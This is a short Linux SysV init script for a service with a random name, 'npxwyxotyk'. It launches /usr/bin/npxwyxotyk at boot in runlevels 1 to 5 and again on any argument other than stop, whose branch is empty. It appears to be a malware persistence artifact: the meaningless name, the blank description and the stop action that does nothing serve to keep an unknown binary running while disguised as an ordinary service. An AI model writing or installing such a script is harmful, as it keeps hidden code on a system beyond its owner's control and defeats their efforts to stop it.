#!/bin/sh
# chkconfig: 12345 90 90
# description: npxwyxotyk
### BEGIN INIT INFO
# Provides:		npxwyxotyk
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	npxwyxotyk
### END INIT INFO
case $1 in
start)
	/usr/bin/npxwyxotyk
	;;
stop)
	;;
*)
	/usr/bin/npxwyxotyk
	;;
esac
